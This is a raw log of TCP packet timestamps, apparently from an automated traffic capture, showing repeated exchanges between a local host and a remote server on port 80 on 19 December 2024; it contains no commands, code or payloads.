                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175640106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175657034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175673962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175698042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175714970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176474094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176526070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176542997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176543951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176563978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.176579952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177371025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177418947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177433968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177453995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177479029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.177495956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178251028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178297043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178600073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178616047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178632021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178643942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178662062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.178673029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179447889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179491043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179517031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179533958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179563046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.179588079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180335999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180378914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180413008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180428982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180454016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.180469990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181216002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181258917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181262970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181276083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181299925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.181314945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182105064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182152987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182163000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182179928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182204008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.182220936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183005095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183044910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183048964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183060884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183082104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183099031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183887005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183928013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183940887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183958054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.183984995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184003115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184789896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184837103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184842110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184859037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184879065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.184891939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185694933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185730934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185739994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185750008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185765028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.185784101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186554909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186603069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186619043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186621904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186638117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.186656952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199090004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199132919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199136019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199151039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199171066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199186087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199493885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199521065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199536085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199537039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199558020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.199575901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.200334072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.200380087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357032061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357079029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357193947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357211113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357234001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357250929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357449055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357491970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357518911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357537031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357558012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.357570887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358318090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358354092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358526945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358566046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358582973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358598948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358619928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.358634949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359213114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359280109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359296083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359307051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359329939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.359359980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360102892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360130072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360146046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360146046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360167980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360193014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.360985994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361044884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361129045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361145020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361172915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361187935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361891031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361927986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361946106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361962080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361984968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.361999035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362756968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362793922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362831116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362847090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362867117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.362880945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363645077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363688946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363699913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363717079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363740921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.363753080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364526033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364566088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364586115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364602089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364622116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.364635944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365408897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365446091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365477085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365492105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365515947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.365533113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366312981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366348028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366357088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366364002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366380930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.366394997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367197037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367233992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367280960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367297888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367331028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.367331028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368088007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368128061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368151903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368168116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368190050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368204117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.368972063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369015932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369018078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369035006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369054079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369081020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369852066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369920015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369931936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369936943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369992018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.369992018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370773077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370815992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370826006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370842934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370860100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.370872974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371650934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371679068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371695042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371696949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371709108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.371727943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372540951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372582912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372596979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372612000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372638941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.372652054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.373435974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.373483896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.373493910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.373511076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.373547077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374325991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374351978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374365091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374368906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374387026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.374403954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375221014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375247955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375262976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375266075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375283003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.375294924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.376199007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.376225948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.376243114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.376257896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.376275063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377151966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377190113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377192974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377207994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377227068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377239943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377875090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.377908945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378165960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378205061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378242970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378257990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378278017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.378298998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379090071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379106045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379123926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379128933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379142046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379156113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.379960060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380021095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380029917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380038977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380057096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380070925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380837917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380877972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380894899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380911112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380934954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.380948067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381721973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381771088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381777048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381788015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381820917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.381820917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382616043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382656097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382669926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382687092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382703066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.382725000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383523941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383550882 CET804986031.41.244.11192.168.2.4
